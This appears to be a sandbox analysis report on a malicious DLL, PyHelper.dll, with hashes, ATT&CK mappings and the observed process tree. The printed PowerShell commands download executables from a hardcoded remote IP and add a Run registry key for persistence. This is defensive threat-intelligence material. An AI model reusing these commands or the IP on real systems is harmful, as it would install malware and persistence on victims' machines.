bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455 | Triage

Analysis

max time kernel
1782s
max time network
1503s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
11-05-2024 10:41

Sharing

Report Analysis Logs

General

Target

PyHelper.dll
Size

236KB
MD5

b7bd2243978cfe44cc0d4b28086c4004
SHA1

bbc0f43de71cddc0a1be48fa98b936ebffb817ac
SHA256

bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455
SHA512

e7f924564bcf1a6173cf29bbbcb16994b3e527a93c1059e7be8e86aa5f5887a852a6a9084862caf3e192a5a70336e6ee22bc169c1f1e0300fa72bb9049a0141f
SSDEEP

3072:aSro30CSFTVOo7qzijtY7HBGsBel05YGoAgbceBBCxRXu+E+NO9o6Kgv:akoELH7k8tY7HkLljr1CTbE55

Score

8^/10

execution persistence

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

41 4276 powershell.exe
42 1676 powershell.exe
43 1532 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1676 powershell.exe
1532 powershell.exe
4276 powershell.exe
Downloads MZ/PE file

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\Documents\\chrome.exe"	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1532	powershell.exe
4276	powershell.exe
1812	powershell.exe
1676	powershell.exe
4276	powershell.exe
1676	powershell.exe
1532	powershell.exe
1812	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

regsvr32.exeRuntimeBroker.exe

description	pid	process	target process
PID 4336 wrote to memory of 4060	4336	regsvr32.exe	RuntimeBroker.exe
PID 4336 wrote to memory of 4060	4336	regsvr32.exe	RuntimeBroker.exe
PID 4336 wrote to memory of 4060	4336	regsvr32.exe	RuntimeBroker.exe
PID 4336 wrote to memory of 4060	4336	regsvr32.exe	RuntimeBroker.exe
PID 4336 wrote to memory of 4060	4336	regsvr32.exe	RuntimeBroker.exe
PID 4336 wrote to memory of 4060	4336	regsvr32.exe	RuntimeBroker.exe
PID 4060 wrote to memory of 1676	4060	RuntimeBroker.exe	powershell.exe
PID 4060 wrote to memory of 1676	4060	RuntimeBroker.exe	powershell.exe
PID 4060 wrote to memory of 4276	4060	RuntimeBroker.exe	powershell.exe
PID 4060 wrote to memory of 4276	4060	RuntimeBroker.exe	powershell.exe
PID 4060 wrote to memory of 1532	4060	RuntimeBroker.exe	powershell.exe
PID 4060 wrote to memory of 1532	4060	RuntimeBroker.exe	powershell.exe
PID 4060 wrote to memory of 1812	4060	RuntimeBroker.exe	powershell.exe
PID 4060 wrote to memory of 1812	4060	RuntimeBroker.exe	powershell.exe

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\PyHelper.dll
1⤵
- Suspicious use of WriteProcessMemory
PID:4336

C:\Windows\system32\RuntimeBroker.exe
RuntimeBroker.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome_elf.dll" -OutFile "$env:USERPROFILE\Documents\chrome_elf.dll""
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome.exe" -OutFile "$env:USERPROFILE\Documents\chrome.exe""
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/105.0.5195.102.manifest" -OutFile "$env:USERPROFILE\Documents\105.0.5195.102.manifest""
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C "New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "update" -Value "$env:USERPROFILE\Documents\chrome.exe" -PropertyType "String" -Force"
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Privilege Escalation

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Defense Evasion

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
12ff85d31d9e76455b77e6658cb06bf0

SHA1
45788e71d4a7fe9fd70b2c0e9494174b01f385eb

SHA256
1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056

SHA512
fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d405540758f0f5bdaab94f1a054cc67d

SHA1
07e307420a26d17c2dc1226af6e72018da4ae26c

SHA256
2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61

SHA512
59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cfzjrnnk.fp1.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1532-30-0x00000224EF5C0000-0x00000224EF5E2000-memory.dmp

Filesize
136KB

Download
memory/4060-4-0x00000190C39D0000-0x00000190C39D1000-memory.dmp

Filesize
4KB

Download
memory/4060-10-0x00000190C3CF0000-0x00000190C3D0D000-memory.dmp

Filesize
116KB

Download
memory/4060-9-0x00000190C3900000-0x00000190C391A000-memory.dmp

Filesize
104KB

Download
memory/4060-17-0x00000190C3CF0000-0x00000190C3D0D000-memory.dmp

Filesize
116KB

Download
memory/4060-7-0x00007FFE27024000-0x00007FFE27025000-memory.dmp

Filesize
4KB

Download
memory/4060-5-0x00000190C39E0000-0x00000190C39E1000-memory.dmp

Filesize
4KB

Download
memory/4276-24-0x00007FFE26F80000-0x00007FFE27189000-memory.dmp

Filesize
2.0MB

Download
memory/4276-70-0x00007FFE26F80000-0x00007FFE27189000-memory.dmp

Filesize
2.0MB

Download
memory/4336-8-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/4336-16-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/4336-0-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/4336-2-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download
memory/4336-1-0x0000000062540000-0x0000000062598000-memory.dmp

Filesize
352KB

Download